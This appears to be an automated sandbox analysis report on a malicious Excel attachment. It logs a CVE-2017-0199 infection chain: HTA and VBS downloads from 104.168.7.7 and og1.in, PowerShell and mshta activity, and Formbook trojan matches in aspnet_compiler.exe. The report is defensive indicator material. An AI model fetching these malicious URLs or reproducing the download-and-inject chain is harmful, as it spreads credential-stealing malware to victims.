Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169

Networking

Source: Network traffic Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49168 -> 104.168.7.7:80
Source: Network traffic Suricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 104.168.7.7:80 -> 192.168.2.22:49168
Source: Network traffic Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49166 -> 104.168.7.7:80
Source: Network traffic Suricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 104.168.7.7:80 -> 192.168.2.22:49166
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: global traffic HTTP traffic detected:
    GET /Ts9zje HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: og1.in
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET /Ts9zje HTTP/1.1
    Accept: */*
    Accept-Language: en-US
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: og1.in
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET /356/ce/IEnetbookupdateion.hta HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 104.168.7.7
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET /356/ce/IEnetbookupdateion.hta HTTP/1.1
    Accept: */*
    Accept-Language: en-US
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Range: bytes=8896-
    Connection: Keep-Alive
    Host: 104.168.7.7
    If-Range: "1cecc-6234bd0fe5c83"
Source: global traffic HTTP traffic detected:
    GET /356/IEnetbookupdation.vbs HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 104.168.7.7
    Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_000007FE899C7018 URLDownloadToFileW, 7_2_000007FE899C7018
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6ACC71F0.emf
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: global traffic DNS traffic detected: DNS query: og1.in
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://104.168.7.7/
Source: powershell.exe, 00000007.00000002.517798504.00000000029D3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://104.168.7.7/356/IEnetbook
Source: powershell.exe, 00000007.00000002.517798504.00000000029D3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://104.168.7.7/356/IEnetbookupdation.vbs
Source: powershell.exe, 00000007.00000002.520144813.000000001A772000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://104.168.7.7/356/IEnetbookupdation.vbsiptor
Source: powershell.exe, 00000007.00000002.517798504.00000000029D3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://104.168.7.7/356/IEnetbookupdation.vbsp
Source: mshta.exe, 00000004.00000003.487027748.0000000000321000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486739919.00000000036FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486308977.0000000000366000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486308977.0000000000321000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487744371.0000000000366000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487744371.0000000000321000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487027748.0000000000366000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://104.168.7.7/356/ce/IEnetbookupdateion.hta
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://104.168.7.7/356/ce/IEnetbookupdateion.hta...Sm
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://104.168.7.7/356/ce/IEnetbookupdateion.htac
Source: mshta.exe, 00000004.00000003.487358638.0000000002F65000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://104.168.7.7/356/ce/IEnetbookupdateion.htahttp://104.168.7.7/356/ce/IEnetbookupdateion.htaP
Source: mshta.exe, 00000004.00000003.486739919.00000000036FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://104.168.7.7/356/ce/IEnetbookupdateion.htase
Source: mshta.exe, 00000004.00000003.486739919.00000000036FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://104.168.7.7/356/ce/IEnetbookupdateion.htattingsk
Source: mshta.exe, 00000004.00000003.487027748.0000000000321000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://104.168.7.7/356/ce/IEnetbookupdateion.htawwC:
Source: mshta.exe, 00000004.00000003.486308977.0000000000366000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487744371.0000000000366000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487027748.0000000000366000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://104.168.7.7/356/ce/IEnetbookupdateion.htaxo
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C270000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520144813.000000001A772000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000007.00000002.520144813.000000001A7A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://go.cr
Source: powershell.exe, 00000007.00000002.517798504.00000000029D3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://go.micros
Source: powershell.exe, 00000007.00000002.519824388.00000000124E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C270000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000007.00000002.517798504.00000000024B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000007.00000002.519824388.00000000124E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000007.00000002.519824388.00000000124E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000007.00000002.519824388.00000000124E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000007.00000002.519824388.00000000124E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486308977.0000000000366000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487744371.0000000000366000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487027748.0000000000366000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://og1.in/
Source: mshta.exe, 00000004.00000002.487716458.00000000002EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487744371.000000000034B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://og1.in/Ts9zje
Source: mshta.exe, 00000004.00000002.487716458.00000000002EA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://og1.in/Ts9zje#
Source: mshta.exe, 00000004.00000003.486739919.00000000036FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://og1.in/Ts9zje.htalicy
Source: mshta.exe, 00000004.00000002.487716458.00000000002EA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://og1.in/Ts9zjeI5
Source: mshta.exe, 00000004.00000003.486308977.0000000000321000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://og1.in/Ts9zjeS
Source: mshta.exe, 00000004.00000002.487716458.00000000002EA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://og1.in/Ts9zjet5
Source: mshta.exe, 00000004.00000003.486308977.0000000000366000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487744371.0000000000366000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487027748.0000000000366000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://og1.in/X
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C270000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown HTTPS traffic detected: 172.67.216.244:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.78.54:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS

E-Banking Fraud

Source: Yara match File source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.536381146.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.536316311.0000000000230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.536381146.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.536316311.0000000000230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: PI#0034250924.xla.xlsx OLE: Microsoft Excel 2007+
Source: F7A30000.0.dr OLE: Microsoft Excel 2007+
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\IEnetbookupdateion[1].hta
Source: C:\Windows\System32\wscript.exe COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\ProgID
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_0042BDA3 NtClose, 13_2_0042BDA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A607AC NtCreateMutant,LdrInitializeThunk, 13_2_00A607AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A5F9F0 NtClose,LdrInitializeThunk, 13_2_00A5F9F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A5FAE8 NtQueryInformationProcess,LdrInitializeThunk, 13_2_00A5FAE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A5FB68 NtFreeVirtualMemory,LdrInitializeThunk, 13_2_00A5FB68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A5FDC0 NtQuerySystemInformation,LdrInitializeThunk, 13_2_00A5FDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A600C4 NtCreateFile, 13_2_00A600C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A60060 NtQuerySection, 13_2_00A60060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A60078 NtResumeThread, 13_2_00A60078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A60048 NtProtectVirtualMemory, 13_2_00A60048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A601D4 NtSetValueKey, 13_2_00A601D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A6010C NtOpenDirectoryObject, 13_2_00A6010C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A60C40 NtGetContextThread, 13_2_00A60C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A610D0 NtOpenProcessToken, 13_2_00A610D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A61148 NtOpenThread, 13_2_00A61148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A5F8CC NtWaitForSingleObject, 13_2_00A5F8CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A61930 NtSetContextThread, 13_2_00A61930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A5F938 NtWriteFile, 13_2_00A5F938
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A5F900 NtReadFile, 13_2_00A5F900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A5FAB8 NtQueryValueKey, 13_2_00A5FAB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A5FAD0 NtAllocateVirtualMemory, 13_2_00A5FAD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A5FA20 NtQueryInformationFile, 13_2_00A5FA20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A5FA50 NtEnumerateValueKey, 13_2_00A5FA50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A5FBB8 NtQueryInformationToken, 13_2_00A5FBB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A5FBE8 NtQueryVirtualMemory, 13_2_00A5FBE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A5FB50 NtCreateKey, 13_2_00A5FB50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A5FC90 NtUnmapViewOfSection, 13_2_00A5FC90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A5FC30 NtOpenProcess, 13_2_00A5FC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A5FC60 NtMapViewOfSection, 13_2_00A5FC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A5FC48 NtSetInformationFile, 13_2_00A5FC48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A61D80 NtSuspendThread, 13_2_00A61D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A5FD8C NtDelayExecution, 13_2_00A5FD8C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A5FD5C NtEnumerateKey, 13_2_00A5FD5C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A5FEA0 NtReadVirtualMemory, 13_2_00A5FEA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A5FED0 NtAdjustPrivilegesToken, 13_2_00A5FED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A5FE24 NtWriteVirtualMemory, 13_2_00A5FE24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A5FFB4 NtCreateSection, 13_2_00A5FFB4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A5FFFC NtCreateProcessEx, 13_2_00A5FFFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A5FF34 NtQueueApcThread, 13_2_00A5FF34
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_000007FE89A9352E 7_2_000007FE89A9352E
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe Code function: 12_2_000007FE8B6574B1 12_2_000007FE8B6574B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00401000 13_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_0040F803 13_2_0040F803
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_004160B3 13_2_004160B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00401260 13_2_00401260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_0040FA23 13_2_0040FA23
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00402ADD 13_2_00402ADD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00402AE0 13_2_00402AE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_0040DAA3 13_2_0040DAA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00402340 13_2_00402340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_0042E333 13_2_0042E333
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00402334 13_2_00402334
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00402E70 13_2_00402E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_0040F7FA 13_2_0040F7FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A6E0C6 13_2_00A6E0C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A6E2E9 13_2_00A6E2E9
